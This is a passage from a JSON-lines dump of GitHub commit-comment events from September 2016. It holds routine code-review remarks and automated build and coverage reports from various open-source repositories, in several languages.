trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n^\n```\n"}},"created_at":"2016-09-19T15:24:51Z"}
{"id":"4583949219","type":"CommitCommentEvent","actor":{"login":"victorlevasseur"},"repo":{"name":"4ian/GD"},"payload":{"comment":{"id":19080439,"position":null,"line":null,"path":null,"commit_id":"6ac34ee7e3065361c16a3a3c82fea300a115c1ed","created_at":"2016-09-19T15:24:52Z","updated_at":"2016-09-19T15:24:52Z","body":"People are missing you on the forum. ;)"}},"created_at":"2016-09-19T15:24:52Z"}
{"id":"4583950637","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":19080443,"position":null,"line":null,"path":null,"commit_id":"9fca4633347cf1b8a656f55bb75ec7894f478033","created_at":"2016-09-19T15:25:08Z","updated_at":"2016-09-19T15:25:08Z","body":"\n      Build report #161060968 for sha 9fca4633347cf1b8a656f55bb75ec7894f478033:\n\n      [![UnitTests](https://img.shields.io/badge/unittests-passed%20%283/3%29%20-brightgreen.svg)](#)\n[![Coverage](https://img.shields.io/badge/coverage-14.07%20%25-yellow.svg)](#)\n[![Cppcheck](https://img.shields.io/badge/cppcheck-0%20error%28s%29-brightgreen.svg)](#)\n[![Code statistics](https://img.shields.io/badge/cloc-2391%20/%209922%20%2824.10%20%25%29-yellow.svg)](#)\n[![Documentation](https://img.shields.io/badge/doc-success-brightgreen.svg)](#)\n[![Documentation coverage](https://img.shields.io/badge/doc--coverage-19.75%20%25-yellow.svg)](#)\n\n\n      https://psycofdj.github.io/xtdcpp/feature/unitests/\n      "}},"created_at":"2016-09-19T15:25:08Z"}
{"id":"4583950752","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"kellykor/personal-website"},"payload":{"comment":{"id":19080444,"position":12,"line":12,"path":"style.css","commit_id":"83af49526597ff8130f861a72151ef4dc4053cff","created_at":"2016-09-19T15:25:10Z","updated_at":"2016-09-19T15:25:10Z","body":"Oops, remove the first semi-colon here."}},"created_at":"2016-09-19T15:25:10Z"}
{"id":"4583954510","type":"CommitCommentEvent","actor":{"login":"apupier"},"repo":{"name":"igarashitm/camel"},"payload":{"comment":{"id":19080455,"position":84,"line":4312,"path":"camel-core/src/main/java/org/apache/camel/impl/DefaultCamelContext.java","commit_id":"498c27d2ba99b04bbe7b90a93329d42b7c718a29","created_at":"2016-09-19T15:25:50Z","updated_at":"2016-09-19T15:25:50Z","body":"In case of Exception, you put the transformer (which is null) in the map even if it has not been initialized?"}},"created_at":"2016-09-19T15:25:50Z"}
{"id":"4583957506","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"kellykor/personal-website"},"payload":{"comment":{"id":19080461,"position":15,"line":15,"path":"style.css","commit_id":"83af49526597ff8130f861a72151ef4dc4053cff","created_at":"2016-09-19T15:26:23Z","updated_at":"2016-09-19T15:26:23Z","body":"Remember to use @fontface or an online service so custom fonts like \"Futura\" or this wont work on anyone else's browser."}},"created_at":"2016-09-19T15:26:23Z"}
{"id":"4583957570","type":"CommitCommentEvent","actor":{"login":"apupier"},"repo":{"name":"igarashitm/camel"},"payload":{"comment":{"id":19080462,"position":85,"line":4313,"path":"camel-core/src/main/java/org/apache/camel/impl/DefaultCamelContext.java","commit_id":"498c27d2ba99b04bbe7b90a93329d42b7c718a29","created_at":"2016-09-19T15:26:24Z","updated_at":"2016-09-19T15:26:24Z","body":"in case of Exception ,we return null, might be better to continue the loop?"}},"created_at":"2016-09-19T15:26:24Z"}
{"id":"4583960579","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"kellykor/personal-website"},"payload":{"comment":{"id":19080470,"position":16,"line":16,"path":"style.css","commit_id":"83af49526597ff8130f861a72151ef4dc4053cff","created_at":"2016-09-19T15:26:53Z","updated_at":"2016-09-19T15:26:53Z","body":"Use pixels or ems instead of points for font sizes."}},"created_at":"2016-09-19T15:26:53Z"}
{"id":"4583964492","type":"CommitCommentEvent","actor":{"login":"bubobot"},"repo":{"name":"bubobox/parse-js"},"payload":{"comment":{"id":19080486,"position":null,"line":null,"path":null,"commit_id":"c9a08a4e112d04d739a4e502e1448629dc7fc5f4","created_at":"2016-09-19T15:27:37Z","updated_at":"2016-09-19T15:27:37Z","body":"[Code coverage](https://120-47334959-gh.circle-artifacts.com/0//home/ubuntu/parse-js/coverage/lcov-report/index.html) is currently at **100%**"}},"created_at":"2016-09-19T15:27:37Z"}
{"id":"4583974404","type":"CommitCommentEvent","actor":{"login":"richardgood"},"repo":{"name":"kamailio/kamailio"},"payload":{"comment":{"id":19080504,"position":null,"line":null,"path":null,"commit_id":"ab3d42c47d52b1b7b315272c00daf121d9f8fc92","created_at":"2016-09-19T15:29:23Z","updated_at":"2016-09-19T15:29:23Z","body":"Hi @vingarzan \r\n\r\nI just want to check with you before I do a change related to this commit.\r\n\r\nWith this change Rx AAR for subscription to signalling status now uses the general flow-usage: AVP_EPC_Flow_Usage_No_Information instead of AVP_EPC_Flow_Usage_AF_Signaling as it previously did.\r\n\r\nI want to change this so the the correct flow-usage is used (even though there is now a proper flow description as well).  Let me know if agreed.\r\n\r\nRegards\r\nRichard. "}},"created_at":"2016-09-19T15:29:23Z"}
{"id":"4583974535","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"Ku60pr/homework3"},"payload":{"comment":{"id":19080505,"position":85,"line":85,"path":"src/Main.java","commit_id":"30746bf366f28399b1d9bccfb55e1982ba0eae8b","created_at":"2016-09-19T15:29:24Z","updated_at":"2016-09-19T15:29:24Z","body":"nonUnique здесь совсем не нужна.\r\nПростой TreeSet с простым компаратором. Разве что компаратор для красоты сделать в виде цепочки - сначала один по длине + другой по содержимому"}},"created_at":"2016-09-19T15:29:24Z"}
{"id":"4583978480","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"Ku60pr/homework3"},"payload":{"comment":{"id":19080509,"position":137,"line":137,"path":"src/Main.java","commit_id":"30746bf366f28399b1d9bccfb55e1982ba0eae8b","created_at":"2016-09-19T15:30:05Z","updated_at":"2016-09-19T15:30:05Z","body":"Можно обойтись обычным Integer"}},"created_at":"2016-09-19T15:30:05Z"}
{"id":"4583979701","type":"CommitCommentEvent","actor":{"login":"diegogoding"},"repo":{"name":"gandm/language-babel"},"payload":{"comment":{"id":19080513,"position":null,"line":null,"path":null,"commit_id":"99944a66a788678e3faad68ba4b48d244906aec6","created_at":"2016-09-19T15:30:21Z","updated_at":"2016-09-19T15:30:21Z","body":"What changes were in this release? It's showing only the minor version number was changed."}},"created_at":"2016-09-19T15:30:21Z"}
{"id":"4583987556","type":"CommitCommentEvent","actor":{"login":"roccobruno"},"repo":{"name":"roccobruno/spring-rest-service"},"payload":{"comment":{"id":19080527,"position":21,"line":58,"path":"src/main/java/com/bruno/db/manager/ManagerDbImpl.java","commit_id":"499ffb614ea2f15ea449bd5f4d10ed94b18b0dc1","created_at":"2016-09-19T15:31:39Z","updated_at":"2016-09-19T15:31:39Z","body":"ma sto ManagerDB che cos'e'??? questa e' logica che va messa nel giusto servizio.. PagamentiService per i pagamenti e cosi' via..."}},"created_at":"2016-09-19T15:31:39Z"}
{"id":"4583990800","type":"CommitCommentEvent","actor":{"login":"saintsebastian"},"repo":{"name":"kindr3d/discourse"},"payload":{"comment":{"id":19080542,"position":7,"line":32,"path":"app/controllers/admin/stats_controller.rb","commit_id":"8c038e84a4163a77c64ede3ec1ce2dd6402a7598","created_at":"2016-09-19T15:32:17Z","updated_at":"2016-09-19T15:32:17Z","body":"we were thinking about that as well, we'll discuss with robin "}},"created_at":"2016-09-19T15:32:17Z"}
{"id":"4584000408","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"Ku60pr/homework3"},"payload":{"comment":{"id":19080555,"position":162,"line":162,"path":"src/Main.java","commit_id":"30746bf366f28399b1d9bccfb55e1982ba0eae8b","created_at":"2016-09-19T15:33:59Z","updated_at":"2016-09-19T15:33:59Z","body":"Используйте listIterator или descendingIterator"}},"created_at":"2016-09-19T15:33:59Z"}
{"id":"4584000450","type":"CommitCommentEvent","actor":{"login":"mansenfranzen"},"repo":{"name":"mansenfranzen/ultimate"},"payload":{"comment":{"id":19080556,"position":19,"line":31,"path":"django/app_tutorial/models.py","commit_id":"bacde997e9999d1b807dde17bbfd5688cf435137","created_at":"2016-09-19T15:33:59Z","updated_at":"2016-09-19T15:33:59Z","body":"Ja gern ;-). Frage mich auch, ob bei Klassen Variablen das Überschreiben von builtins wie 'object' und 'type' so clever ist, auch wenn diese Variablen innerhalb des Klassen-Namespaces bleiben."}},"created_at":"2016-09-19T15:33:59Z"}
{"id":"4584001838","type":"CommitCommentEvent","actor":{"login":"myfreeer"},"repo":{"name":"myfreeer/bilibili-helper"},"payload":{"comment":{"id":19080562,"position":null,"line":null,"path":null,"commit_id":"0afcd64cf6e0935b3a87441280cd118616b80d6c","created_at":"2016-09-19T15:34:16Z","updated_at":"2016-09-19T15:34:16Z","body":"code that ***fails***\r\n```js\r\n        swalConfirm: function() {\r\n            var isConfirmed = false;\r\n            swal({\r\n            title: \"是否清空当前列表?\", \r\n             text: '确认: 清空'+danmaku_filter.filters.length+'条规则并导入XML规则\\n取消: 将XML规则添加在当前规则后',   \r\n            type: \"warning\", \r\n              showCancelButton: true,   \r\n            confirmButtonColor: \"#DD6B55\", \r\n              confirmButtonText: \"确认\",\r\n                    cancelButtonText: \"取消\"\r\n            }, function(){ isConfirmed=true;  });\r\n            return isConfirmed;\r\n        },\r\n```"}},"created_at":"2016-09-19T15:34:16Z"}
{"id":"4584002928","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"Ku60pr/homework3"},"payload":{"comment":{"id":19080565,"position":3,"line":3,"path":"src/ru/sberbank/school/Uniqueness.java","commit_id":"30746bf366f28399b1d9bccfb55e1982ba0eae8b","created_at":"2016-09-19T15:34:27Z","updated_at":"2016-09-19T15:34:27Z","body":"Бессмысленен"}},"created_at":"2016-09-19T15:34:27Z"}
{"id":"4584005835","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19080573,"position":null,"line":null,"path":null,"commit_id":"b724e2cd0087adca18edf2746078fd13a4f97f1e","created_at":"2016-09-19T15:34:55Z","updated_at":"2016-09-19T15:34:55Z","body":"129956421-Scalable-Sizing-HTRad-Heat-Crash (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1765 of 1766 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b724e2cd0087adca18edf2746078fd13a4f97f1e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b724e2cd0087adca18edf2746078fd13a4f97f1e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b724e2cd0087adca18edf2746078fd13a4f97f1e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.9%25-green.svg)</a>\n"}},"created_at":"2016-09-19T15:34:55Z"}
{"id":"4584006237","type":"CommitCommentEvent","actor":{"login":"cgchoffman"},"repo":{"name":"Komodo/KomodoEdit"},"payload":{"comment":{"id":19080575,"position":20,"line":49,"path":"src/chrome/komodo/content/sdk/ui/menu.js","commit_id":"d09a2235980c0c819993e507ac50fa14c16e60cf","created_at":"2016-09-19T15:35:00Z","updated_at":"2016-09-19T15:35:00Z","body":"I've already changed this to `else if (menuitems &&  !Array)`.  I must not have merged it to Edit.  I avoid embedding `if`s at all cost.  At some point I'm fairly sure you told me not to do that."}},"created_at":"2016-09-19T15:35:00Z"}
{"id":"4584011543","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"kyliemks/personal-website"},"payload":{"comment":{"id":19080593,"position":5,"line":4,"path":"index.html","commit_id":"79468b6ae603c4fc1bf08988d3d33fe21f3b5c8f","created_at":"2016-09-19T15:36:00Z","updated_at":"2016-09-19T15:36:00Z","body":"This should be linking to the stylesheet in your css folder. So it would be \"css/style.css\" to get it to work."}},"created_at":"2016-09-19T15:36:00Z"}
{"id":"4584014246","type":"CommitCommentEvent","actor":{"login":"wizz13150"},"repo":{"name":"Lunat1q/Catchem-PoGo"},"payload":{"comment":{"id":19080600,"position":29,"line":36,"path":"Translations/Interface/Français.json","commit_id":"68d98151798de1095290d0b504ce6ffae3e8a04a","created_at":"2016-09-19T15:36:32Z","updated_at":"2016-09-19T15:36:32Z","body":"Ola, \"Suivre le personnage\" appear to be cut, rly cut.\r\nCan you just change this by \"Centrer\" or \"Centrer Sacha\" or a funny word\r\nty\r\n:)"}},"created_at":"2016-09-19T15:36:32Z"}
{"id":"4584015069","type":"CommitCommentEvent","actor":{"login":"mansenfranzen"},"repo":{"name":"mansenfranzen/ultimate"},"payload":{"comment":{"id":19080603,"position":38,"line":38,"path":"material/db_table.md","commit_id":"3295b3438ff47a3496ff57f4e8058394a0402c86","created_at":"2016-09-19T15:36:40Z","updated_at":"2016-09-19T15:36:40Z","body":"Können wir hier klären #1 "}},"created_at":"2016-09-19T15:36:40Z"}
{"id":"4584016274","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"kyliemks/personal-website"},"payload":{"comment":{"id":19080609,"position":18,"line":13,"path":"index.html","commit_id":"79468b6ae603c4fc1bf08988d3d33fe21f3b5c8f","created_at":"2016-09-19T15:36:53Z","updated_at":"2016-09-19T15:36:53Z","body":"You could use `text-align: center;` to get this to be centered (and for the rest)."}},"created_at":"2016-09-19T15:36:53Z"}
{"id":"4584017209","type":"CommitCommentEvent","actor":{"login":"JoinRajuncraftNow"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":19080614,"position":null,"line":null,"path":null,"commit_id":"2833ac719fbf9e5ba9ae3c5dd0281adaee091909","created_at":"2016-09-19T15:37:03Z","updated_at":"2016-09-19T15:37:03Z","body":"You see, now that breaks it on MY computer. Something tells me we should be doing this at home, and not on school computers XD."}},"created_at":"2016-09-19T15:37:03Z"}
{"id":"4584018853","type":"CommitCommentEvent","actor":{"login":"geanders"},"repo":{"name":"geanders/countytimezones"},"payload":{"comment":{"id":19080618,"position":null,"line":null,"path":null,"commit_id":"dddcd4f7f10e8fb45bd056c81d5a653e843fece8","created_at":"2016-09-19T15:37:22Z","updated_at":"2016-09-19T15:37:22Z","body":"For any of the r scripts, you just need to save, commit locally (within your RStudio session, for example, and then push to GitHub. "}},"created_at":"2016-09-19T15:37:22Z"}
{"id":"4584019267","type":"CommitCommentEvent","actor":{"login":"sipayRT"},"repo":{"name":"gemini-testing/gemini"},"payload":{"comment":{"id":19080620,"position":null,"line":null,"path":null,"commit_id":"3eae59032adefcacb23a45a38222a33517ba54e4","created_at":"2016-09-19T15:37:26Z","updated_at":"2016-09-19T15:37:26Z","body":"я не против, но что тогда писать в таких версиях? "}},"created_at":"2016-09-19T15:37:26Z"}
{"id":"4584022560","type":"CommitCommentEvent","actor":{"login":"bubobot"},"repo":{"name":"bubobox/parse-js"},"payload":{"comment":{"id":19080626,"position":null,"line":null,"path":null,"commit_id":"ab43ff58c2d5633bdf9ab80fdcff6c91dbaac5cb","created_at":"2016-09-19T15:38:00Z","updated_at":"2016-09-19T15:38:00Z","body":"[Code coverage](https://121-47334959-gh.circle-artifacts.com/0//home/ubuntu/parse-js/coverage/lcov-report/index.html) is currently at **100%**"}},"created_at":"2016-09-19T15:38:00Z"}
{"id":"4584024843","type":"CommitCommentEvent","actor":{"login":"rtlanceroad"},"repo":{"name":"6c37/crux-ports"},"payload":{"comment":{"id":19080632,"position":null,"line":null,"path":null,"commit_id":"358e309bdb9ab01d7aea786b29d608a21033915c","created_at":"2016-09-19T15:38:26Z","updated_at":"2016-09-19T15:38:26Z","body":"@wildefyr This is *not* git release, I just just clone the repo and checkout stable 0.60 branch. The reason I did this is because upstream just has release news, no tarball are made."}},"created_at":"2016-09-19T15:38:26Z"}
{"id":"4584024864","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":19080633,"position":null,"line":null,"path":null,"commit_id":"680cca99fa980546a782287eeeed6755fd089d44","created_at":"2016-09-19T15:38:26Z","updated_at":"2016-09-19T15:38:26Z","body":"\nBuild report #161064519 for sha 680cca99fa980546a782287eeeed6755fd089d44:\n\n[![UnitTests](https://img.shields.io/badge/unittests-passed%20%283/3%29%20-brightgreen.svg)](#)\n[![Coverage](https://img.shields.io/badge/coverage-14.07%20%25-yellow.svg)](#)\n[![Cppcheck](https://img.shields.io/badge/cppcheck-0%20error%28s%29-brightgreen.svg)](#)\n[![Code statistics](https://img.shields.io/badge/cloc-2391%20/%209922%20%2824.10%20%25%29-yellow.svg)](#)\n[![Documentation](https://img.shields.io/badge/doc-success-brightgreen.svg)](#)\n[![Documentation coverage](https://img.shields.io/badge/doc--coverage-19.75%20%25-yellow.svg)](#)\n\n\n[Reports](https://psycofdj.github.io/xtdcpp/feature/unitests/)\n      "}},"created_at":"2016-09-19T15:38:26Z"}
{"id":"4584026704","type":"CommitCommentEvent","actor":{"login":"mansenfranzen"},"repo":{"name":"mansenfranzen/ultimate"},"payload":{"comment":{"id":19080636,"position":11,"line":23,"path":"django/app_tutorial/models.py","commit_id":"bacde997e9999d1b807dde17bbfd5688cf435137","created_at":"2016-09-19T15:38:45Z","updated_at":"2016-09-19T15:38:45Z","body":"Können wir hier klären: #2 "}},"created_at":"2016-09-19T15:38:45Z"}
{"id":"4584030968","type":"CommitCommentEvent","actor":{"login":"rtlanceroad"},"repo":{"name":"6c37/crux-ports"},"payload":{"comment":{"id":19080643,"position":null,"line":null,"path":null,"commit_id":"358e309bdb9ab01d7aea786b29d608a21033915c","created_at":"2016-09-19T15:39:33Z","updated_at":"2016-09-19T15:39:33Z","body":"@onodera-punpun if that repacked tarball is trustable, please fix source(). :-) "}},"created_at":"2016-09-19T15:39:33Z"}
{"id":"4584031275","type":"CommitCommentEvent","actor":{"login":"lorenzhs"},"repo":{"name":"glowing-bear/glowing-bear"},"payload":{"comment":{"id":19080645,"position":8,"line":217,"path":"js/filters.js","commit_id":"ae62a5ebb929ddc343cd2b1c21ec6ffb48038c71","created_at":"2016-09-19T15:39:36Z","updated_at":"2016-09-19T15:39:36Z","body":"I removed that with a force push, shouldn't be in the branch any more"}},"created_at":"2016-09-19T15:39:36Z"}
{"id":"4584033283","type":"CommitCommentEvent","actor":{"login":"alex-ab"},"repo":{"name":"alex-ab/genode"},"payload":{"comment":{"id":19080657,"position":null,"line":null,"path":null,"commit_id":"784909480833c44cf7c3910f4d9272b3adfb6e05","created_at":"2016-09-19T15:39:57Z","updated_at":"2016-09-19T15:39:57Z","body":"@chelmuth: please add to staging"}},"created_at":"2016-09-19T15:39:57Z"}
{"id":"4584033894","type":"CommitCommentEvent","actor":{"login":"aganita"},"repo":{"name":"hannahlorane/polished"},"payload":{"comment":{"id":19080661,"position":55,"line":55,"path":"browser/js/app.js","commit_id":"1a747de032a0801d75a951c4b7f68ec4b9bfda54","created_at":"2016-09-19T15:40:05Z","updated_at":"2016-09-19T15:40:05Z","body":"```js\r\napp.run(function ($rootScope) {\r\n    $rootScope.$on('$stateChangeError', function (event, toState, toParams, fromState, fromParams, thrownError) {\r\n      console.info(`The following error was thrown by ui-router while transitioning to state \"${toState.name}\". The origin of this error is probably a resolve function:`);\r\n        console.error(thrownError);\r\n    });\r\n });\r\n```"}},"created_at":"2016-09-19T15:40:05Z"}
{"id":"4584040847","type":"CommitCommentEvent","actor":{"login":"MingcongBai"},"repo":{"name":"AOSC-Dev/aosc-os-abbs"},"payload":{"comment":{"id":19080680,"position":3,"line":3,"path":"extra-android/mkbootimg/autobuild/defines","commit_id":"31aefbda00d5b93e02619b895e84c52a5c47d346","created_at":"2016-09-19T15:41:24Z","updated_at":"2016-09-19T15:41:24Z","body":"Is there no dependency at all?"}},"created_at":"2016-09-19T15:41:24Z"}
{"id":"4584044455","type":"CommitCommentEvent","actor":{"login":"MingcongBai"},"repo":{"name":"AOSC-Dev/aosc-os-abbs"},"payload":{"comment":{"id":19080695,"position":6,"line":6,"path":"extra-android/mkbootimg/autobuild/build","commit_id":"31aefbda00d5b93e02619b895e84c52a5c47d346","created_at":"2016-09-19T15:42:00Z","updated_at":"2016-09-19T15:42:00Z","body":"Wrong parentheses!"}},"created_at":"2016-09-19T15:42:00Z"}
{"id":"4584049162","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19080707,"position":null,"line":null,"path":null,"commit_id":"4b1d08727250668b1de3f896b5332f2b9e3df1f4","created_at":"2016-09-19T15:42:52Z","updated_at":"2016-09-19T15:42:52Z","body":"ASIHPValidation (shenb) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1190 of 1190 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4b1d08727250668b1de3f896b5332f2b9e3df1f4-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4b1d08727250668b1de3f896b5332f2b9e3df1f4-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4b1d08727250668b1de3f896b5332f2b9e3df1f4-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.1%25-green.svg)</a>\n"}},"created_at":"2016-09-19T15:42:52Z"}
{"id":"4584054506","type":"CommitCommentEvent","actor":{"login":"okitec"},"repo":{"name":"okitec/teutoburg"},"payload":{"comment":{"id":19080718,"position":null,"line":null,"path":null,"commit_id":"ed26297c18d4b079fc8c09a21cc012d014ca7a75","created_at":"2016-09-19T15:43:50Z","updated_at":"2016-09-19T15:43:50Z","body":"@drt2016 I did as you wished."}},"created_at":"2016-09-19T15:43:50Z"}
{"id":"4584062691","type":"CommitCommentEvent","actor":{"login":"jstrachan"},"repo":{"name":"fabric8io/fabric8-console"},"payload":{"comment":{"id":19080739,"position":null,"line":null,"path":null,"commit_id":"3d5281e1946701589c9e4aedcf848b081214dd89","created_at":"2016-09-19T15:45:22Z","updated_at":"2016-09-19T15:45:22Z","body":"looks like we need to remove those single quotes now"}},"created_at":"2016-09-19T15:45:22Z"}
{"id":"4584066777","type":"CommitCommentEvent","actor":{"login":"ObaniGemini"},"repo":{"name":"KOBUGE-Games/minilens"},"payload":{"comment":{"id":19080746,"position":null,"line":null,"path":null,"commit_id":"047a233422fcb3f6763abbc1863ce3603afc832b","created_at":"2016-09-19T15:46:02Z","updated_at":"2016-09-19T15:46:02Z","body":"Can somebody check if everything is right there ? This is the most problematic commit and mostly the one I needed reviews, as I don't remember most of the modifs there"}},"created_at":"2016-09-19T15:46:02Z"}
{"id":"4584070742","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19080754,"position":null,"line":null,"path":null,"commit_id":"5bf1348e99cef86f5941f473c7bb6016ab521fa2","created_at":"2016-09-19T15:46:44Z","updated_at":"2016-09-19T15:46:44Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1049](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13571&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-19T15:46:44Z"}
{"id":"4584073861","type":"CommitCommentEvent","actor":{"login":"nicksnyder"},"repo":{"name":"linkedin/ConsistencyManager-iOS"},"payload":{"comment":{"id":19080763,"position":null,"line":null,"path":null,"commit_id":"23507502e28db01f536d8999a6724c583fe05dff","created_at":"2016-09-19T15:47:17Z","updated_at":"2016-09-19T15:47:17Z","body":"I would just try it with both to see if it passes. iirc, iOS 8 simulator failed 100% of the time for me."}},"created_at":"2016-09-19T15:47:17Z"}
{"id":"4584080263","type":"CommitCommentEvent","actor":{"login":"PeratX"},"repo":{"name":"iTXTech/PacketLogger"},"payload":{"comment":{"id":19080787,"position":null,"line":null,"path":null,"commit_id":"c3fffda3ebaf5c14afbdbec2f0fccde130092dbe","created_at":"2016-09-19T15:48:27Z","updated_at":"2016-09-19T15:48:27Z","body":"A forwarder maybe more useful."}},"created_at":"2016-09-19T15:48:27Z"}
{"id":"4584081563","type":"CommitCommentEvent","actor":{"login":"Thunderzyk"},"repo":{"name":"Thunderzyk/cpp-work"},"payload":{"comment":{"id":19080792,"position":null,"line":null,"path":null,"commit_id":"46901f479e0d679741c030b6d1ba8f291d321e99","created_at":"2016-09-19T15:48:40Z","updated_at":"2016-09-19T15:48:40Z","body":"second work"}},"created_at":"2016-09-19T15:48:40Z"}
{"id":"4584087762","type":"CommitCommentEvent","actor":{"login":"wizz13150"},"repo":{"name":"Lunat1q/Catchem-PoGo"},"payload":{"comment":{"id":19080807,"position":null,"line":null,"path":null,"commit_id":"68d98151798de1095290d0b504ce6ffae3e8a04a","created_at":"2016-09-19T15:49:45Z","updated_at":"2016-09-19T15:49:45Z","body":"Ola, on line 71 : \r\n \"%EVOLVE_IV_VALUE%\": \"Valeur IV pour Evolution\",\r\nCan you change this to \"IV min pour évoluer\" ,like line 80\r\nty\r\n:)\r\n"}},"created_at":"2016-09-19T15:49:45Z"}
{"id":"4584094407","type":"CommitCommentEvent","actor":{"login":"tudurom"},"repo":{"name":"6c37/crux-ports"},"payload":{"comment":{"id":19080822,"position":null,"line":null,"path":null,"commit_id":"9d7dfa966e66dfc2278d0061d13f6c232234a601","created_at":"2016-09-19T15:51:00Z","updated_at":"2016-09-19T15:51:00Z","body":"i literally copied the port from contrib, sorry\r\n"}},"created_at":"2016-09-19T15:51:00Z"}
{"id":"4584097380","type":"CommitCommentEvent","actor":{"login":"techra"},"repo":{"name":"4pr0n/ripme"},"payload":{"comment":{"id":19080835,"position":null,"line":null,"path":null,"commit_id":"ca4ed62971035a358803bce9f918d86841054417","created_at":"2016-09-19T15:51:33Z","updated_at":"2016-09-19T15:51:33Z","body":"Is there a way for this to pick up png images? What about the image titles integrated into the filename when retrieved via HTTP?\r\nhttp://pictures.hentai-foundry.com//z/Zep/425726.png\r\nhttp://pictures.hentai-foundry.com/z/Zep/425726/Zep-425726-Tamaranean_Casual_Friday.png"}},"created_at":"2016-09-19T15:51:33Z"}
{"id":"4584102663","type":"CommitCommentEvent","actor":{"login":"VoyagerOne"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":19080852,"position":null,"line":null,"path":null,"commit_id":"155caf938a0cd58600d95ac34ab4652da97bca0e","created_at":"2016-09-19T15:52:32Z","updated_at":"2016-09-19T15:52:32Z","body":"This is not a simplification...IMO.\r\nHaving the array has the benefit of no calculation overhead and developers easily know what the values are instead of doing the math."}},"created_at":"2016-09-19T15:52:32Z"}
{"id":"4584102705","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19080853,"position":null,"line":null,"path":null,"commit_id":"14ef3a4d5b4f6296327f647ceb02df5bde9aad93","created_at":"2016-09-19T15:52:33Z","updated_at":"2016-09-19T15:52:33Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1051](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13573&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-19T15:52:33Z"}
{"id":"4584102862","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":19080854,"position":null,"line":null,"path":null,"commit_id":"2833ac719fbf9e5ba9ae3c5dd0281adaee091909","created_at":"2016-09-19T15:52:35Z","updated_at":"2016-09-19T15:52:35Z","body":"I'm going to save my battery!"}},"created_at":"2016-09-19T15:52:35Z"}
{"id":"4584102998","type":"CommitCommentEvent","actor":{"login":"QuotableWater7"},"repo":{"name":"gaearon/redux-thunk"},"payload":{"comment":{"id":19080855,"position":null,"line":null,"path":null,"commit_id":"41aefcc28a80d2b21f8ee1e68639757bf6d7ba49","created_at":"2016-09-19T15:52:36Z","updated_at":"2016-09-19T15:52:36Z","body":"@TrySound thanks!"}},"created_at":"2016-09-19T15:52:36Z"}
{"id":"4584103624","type":"CommitCommentEvent","actor":{"login":"wizz13150"},"repo":{"name":"Lunat1q/Catchem-PoGo"},"payload":{"comment":{"id":19080857,"position":65,"line":78,"path":"Translations/Interface/Français.json","commit_id":"68d98151798de1095290d0b504ce6ffae3e8a04a","created_at":"2016-09-19T15:52:42Z","updated_at":"2016-09-19T15:52:42Z","body":"Ola, the same.\r\nCan you change \"Recharger le Pokemon si IV Min\" by\r\n\"IV Min pour recharger le Pokemon\"\r\nty\r\n:)"}},"created_at":"2016-09-19T15:52:42Z"}
